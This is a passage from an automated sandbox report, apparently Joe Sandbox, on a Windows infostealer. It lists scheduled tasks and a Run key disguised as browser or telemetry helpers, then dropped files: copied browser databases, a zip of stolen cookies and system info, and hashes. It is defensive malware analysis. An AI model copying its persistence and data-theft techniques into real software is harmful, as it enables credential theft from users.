                                                                                                                                                14:10:57Task SchedulerRun new task: Firefox Default Browser Agent A4EC042678D4669E path: C:\Users\user\AppData\Roaming\bhhudtb
                                                                                                                                                14:11:02Task SchedulerRun new task: Firefox Default Browser Agent 621E197CCCA21806 path: C:\Users\user\AppData\Roaming\fehudtb
                                                                                                                                                14:11:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1ba0d279-1ad8-451e-a70f-de201594af59\C295.exe" --AutoStart
                                                                                                                                                14:11:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1ba0d279-1ad8-451e-a70f-de201594af59\C295.exe" --AutoStart
                                                                                                                                                14:11:27Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\1ba0d279-1ad8-451e-a70f-de201594af59\C295.exe s>--Task
                                                                                                                                                14:11:40Task SchedulerRun new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\LocalLow\AQNoUsTOxr
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):118784
                                                                                                                                                Entropy (8bit):0.7814144457324289
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:dIQLKnlxKp2LK3IQkKylSK62kK0L62y7z3qU+bDoYysX0uhnydVjN9DLjGQLBE3M:962I+bDo3irhnydVj3XBBE3ud
                                                                                                                                                MD5:D9EB8022FD3B8EE752008BD119F0FBBB
                                                                                                                                                SHA1:32B613EFA72902BFB39EA6FF27B0E9F8D3985A33
                                                                                                                                                SHA-256:69858096A6332A75B2B491B0AB2DFD8359123FB17B794DD7BA84373DC34B1484
                                                                                                                                                SHA-512:87C58557D1D8E3DAA6053C5D4C7210378ADA090BA3EB22FE5306DFC234A98AB86EF7E212696CA6576072E535ECE3D6F1C44750843B555D773EBA4E29A1B619B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\LocalLow\chrome_urls.txt
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1429
                                                                                                                                                Entropy (8bit):5.274877286745222
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MZTRbQJwlnu4EIfoMmQJwlnu4EjH9oMmQJwlnu4GTRbQJwlWu4gIfoMmQJwlWu4W:AlpMIQPM2P+lp9IQP92PE
                                                                                                                                                MD5:4347CC65785803494752CF2338D19AAB
                                                                                                                                                SHA1:B68A8009D28D1BC48DA8964FFC446696964058E9
                                                                                                                                                SHA-256:B217C805BAF5AA4D69E3BC4A51859827E613253E7B55CBCD3B07560D5C2115FA
                                                                                                                                                SHA-512:FDB0D5A4151C4C26B7E8BEC6A35A16DFAED941C5D3072D830A925EB83DBE731811F8C259BB36284FEC8BD86202DA5BB4E5E681F1819486FECCE7CDC2EF119760
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: URL: http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0..Count: 2..Last visit: 2021-10-29 21:10:29......URL: https://docs.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0..Count: 2..Last visit: 2021-10-29 21:10:29......URL: https://docs.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0..Count: 2..Last visit: 2021-10-29 21:10:29......URL: http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0..Count: 2..Last visit: 2021-10-29 21:10:50......URL: https://docs.microsoft.com/dot
                                                                                                                                                C:\Users\user\AppData\LocalLow\fPT59QhKSGE.zip
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1841
                                                                                                                                                Entropy (8bit):7.634695689852965
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:9jTO6RC/Ep21CPXRsy8zeRiByTkmKdLzGDz7ytNvN2bEVm3jWzuq1OSdFN5y6v88:9NCsMUXR1niBjjmP62QdzuKOW5y6F
                                                                                                                                                MD5:2C527C1F4D30880EA86DDE4C0CC1CD23
                                                                                                                                                SHA1:01FDEBB33BB4E6234DC360A7C895B8DD4AC6EB8F
                                                                                                                                                SHA-256:C5F7E2C50ADD5B0D058EF07659A7E437B73516D652B7927B2698B64B5C3412B2
                                                                                                                                                SHA-512:58A4EB7CB8E5B2F2C4BEEE3A2FCF16D5B30B83097638D914B43C422D975F78EAEFD08C9ACE05D65106BED87042AB7F08AC301DCA501DB700580EA971E8C761F1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: PK.........q]S............*...browsers/cookies/Google Chrome_Default.txtUT.....|a..|a..|a..Kk.1...2.ox7..........b....FJD.3.Fi0..G.iZ(iR.JH.{.{.......`.0.>..%7..))..%.rY{.....X......FJ.f8...+c..B.3.K..j.."...b%Z.k.....Vf.V!....!$.R1 ...../O.-h..G.e..VZX.....W......O...vQ....n.8.Z/@0..+.T......A^Q".{g.H..9..Km4.....|..+.='..w.......s._.z..5)..x.:.u).O.`.eK,W.....ZU c.P..jl.RFr-.=..&lF7..F.>.w...4..h..uy].... ..h.x.q.7..R.R.c...C.R.~L...\ .p2.p.z.m...y...Oi7~(.._4-...~HE~.....PK.........q]S................browsers/chrome_urls.txtUT.....|a..|a..|a..Ok. ...{!.!'....v.....a.6...Z.1.............<....g..W.>.Wa..y...`.......9....t\L.;J.&...W....}....a.<!%....g.m.|y\.g.z.....(>.e..2....y+$@.;.88#....2.g....Z.1B..0|{........^u.YH>&cZ.$....*-..CH...p$..(.2-hEIU.I2.k.a..o..O.....>F<Y....Zc.V.....Y..A6.?'.&..?9/...\.F..}?...|..-..|1..PK.........q]S.......=.......System Info.txtUT.....|a..|a..|auS.n.0.<.@.a.2..$...S.W.6N..A.\.Fbl"2).R^..w..nr.a...p.;...Ea....HB8x..
                                                                                                                                                C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):1.4334508710755112
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:dNwf2WtfkjzS8NhV2Q0Ch32uwnnihkKLdH2Qf2:du5wEkhGhBH
                                                                                                                                                MD5:4A5E8FB665F7F9C276B38C5CFBD15D10
                                                                                                                                                SHA1:A0DF8F94A3A67B03A569A25A0658104A7915E029
                                                                                                                                                SHA-256:E095AE577F462636A5DB3107A1033540E1695071DCC03405422651D391339AA8
                                                                                                                                                SHA-512:492F3F1350E5F52CC80D62CD26EEE984E6C98444F55CDF75824263CA19EA9FF0834D74394104D655F209DFF88FB49B74BDE3C941978E88AC2A4644498AC14250
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):916735
                                                                                                                                                Entropy (8bit):6.514932604208782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                                                                                MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                                                                                SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                                                                                SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                                                                                SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\13c08b90-0c19-4b85-83da-a9c4dd83285c.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):96740
                                                                                                                                                Entropy (8bit):3.75005252311946
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:2K34dqKZGMX8OPsvvV4+lENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4zcb1FlSg:5346K+59CX+Oge7tD3Q3rG/KxPNTr
                                                                                                                                                MD5:795ADA0AD7DFBD414E443CC12889C188
                                                                                                                                                SHA1:C5682B9CBEB5489E2B8DA1C0BDD0264CB90880B9
                                                                                                                                                SHA-256:2FC2EECBF22C8AA6A370CBF0884B1C8627C9A2BEE6AC59FC769DE7E1FA95BB87
                                                                                                                                                SHA-512:ABE86A19820206AD6431C0758A59C578C5A859FD32AAE0751E5CBD2EFD73CE7AA9D0B6A7156FA0E15568F91C0EC8CE9DECA28B109FFF9B5E415B21D0248D8B0B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .y..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\17b6b034-6ccd-4bbe-8ead-8ffd7655270a.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.0767786021951835
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:h8PLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:aPLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:FB20DB9CC2ECCF503196D173C40E506F
                                                                                                                                                SHA1:31D0BFFF97A8EAD257DAC75A19334A4269CC18EA
                                                                                                                                                SHA-256:41A240AD71C126200141586D587A7C211542BDD575B038DA91B7DC1AC5C37250
                                                                                                                                                SHA-512:CE04CF7A66FF3F14C76A76C530E66903DCAB52962979A66B2D280DD19072530282CA9F23B922DB6367D733A4A09583138B24A52F4E97320A55F027E9D543A6D4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\3366f6f8-0dc7-4d25-b0cb-16ae790a8a61.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:SysEx File -
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):94708
                                                                                                                                                Entropy (8bit):3.7494983911950053
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:lK34dqZpX8OPsvvV4+lENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4zcb1FlSO/h:k34ZK+59CX+Oge7tD3Q3rG/KxPNBd
                                                                                                                                                MD5:F24E50A646EF83AE65C4D3C84057E0E1
                                                                                                                                                SHA1:D0BC925FF3DCA80A088D30368CE65F90469FB451
                                                                                                                                                SHA-256:93DDEBD8F5655128F26C795AC39A3E6F1BED3A9C18A3CCED0CB758F27532BDA7
                                                                                                                                                SHA-512:D07C49BFB8036241196E30EC65130BD898F1D19F2B1DF28EFE26A49A0447DBD4787BBFE57EEB3B7A7FDFE440A535E4347323B0A29B201568DDCEF38787861E90
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .q..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\3867d940-4f91-4cd9-bedf-1b681a77be65.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5298aac8-1da2-471d-8294-5dab686fcd20.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):176739
                                                                                                                                                Entropy (8bit):6.047238136544904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:nLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:nLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:0A420CBFE79BE2CEAEAF4E46E41FE083
                                                                                                                                                SHA1:1B8E2EC3BDD26F1FC6D885F6477EE3970F4DE337
                                                                                                                                                SHA-256:92EE68E061C0E63F5C2FFAE49B08F8F043D39A755B6534C62EED4C2C36EFF2DB
                                                                                                                                                SHA-512:0E26A621E1D22EB7EE984D99629D0457199BB2A0C46A49D1C4391B5DD420C5874BD232B84A9D3A027D8FBA6B074661779053564DFE8B1CB5A7652E58E9DFD790
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799845608"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5ebd71b0-feab-4966-8817-fc85f426ba9f.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780431502545
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hgLLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:mLLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:C6253FD173F227E4E7F1D3EE08B8F6E0
                                                                                                                                                SHA1:E47BBBFAEE3A8AB40D874B80A6567A1F29919548
                                                                                                                                                SHA-256:75D32CFD112422BB63CB13795D6E93350D085BB509A1DD2E380B202F2A9C32E7
                                                                                                                                                SHA-512:DC5CD4C2B983686ECF7DCD5A0AB3624AA95F59868B2D2CA23DC983D50576556090AEB3733F6BCA0D50C0962B64A7659321E4BA6055ADE9EE910BDEF0E8484B72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
